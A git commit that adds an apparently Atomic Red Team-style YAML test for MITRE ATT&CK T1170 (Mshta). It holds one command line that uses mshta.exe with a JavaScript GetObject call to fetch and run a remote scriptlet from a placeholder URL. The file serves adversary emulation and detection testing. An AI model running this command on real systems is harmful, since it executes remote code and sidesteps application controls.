This commit is contained in:
Brian Beyer
2018-05-12 23:28:38 +02:00
parent 86b3418c73
commit 280b356f57
+18
View File
@@ -0,0 +1,18 @@
attack_technique: T1170
display_name: Mshta
atomic_tests:
- name: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject
description: |
Test execution of a remote script using mshta.exe
supported_platforms:
- windows
input_arguments:
file_url:
description: location of the payload
type: Url
default: https://www.example.com/mshta.sct
executor:
name: command_prompt
command: |
mshta.exe javascript:a=GetObject("script:#{file_url}").Exec();close();